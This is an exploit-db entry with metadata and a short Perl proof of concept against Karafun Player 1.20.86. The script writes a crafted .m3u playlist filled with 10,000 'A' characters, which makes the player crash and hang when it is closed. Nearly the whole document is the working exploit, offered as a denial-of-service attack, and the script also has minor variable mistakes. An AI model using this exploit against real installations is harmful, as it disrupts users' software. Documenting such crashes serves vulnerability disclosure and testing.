Karafun Player 1.20.86 - '.m3u' Crash (PoC)
Author: Styxosaurus
type: dos
platform: windows
port:
date_added: 2012-06-16
date_updated: 2012-06-17
verified: 1
codes:
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt19500/karafunplayer.png
application_url: http://www.exploit-db.comkarafunplayer_1.20.86.exe
#
# Exploit Title: Karafun Player V1.20.86 .m3u file Denial of Service
# Date: 2012.6.15
# Vulnerability Discovered & Exploit by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Software Link: http://www.karafun.com/karaokeplayer/
# Version: V1.20.86
# Description:
# Karafun will crash and not responding when trying to close it after
# runs a special crafted .m3u file.
my $JUNK= "A" x 10000;
my $FILE="Karafun.m3u";
open(my $FILE, ">$FILE") or die "Cannot open $file: $!";
print $FILE $JUNK;
close($FILE);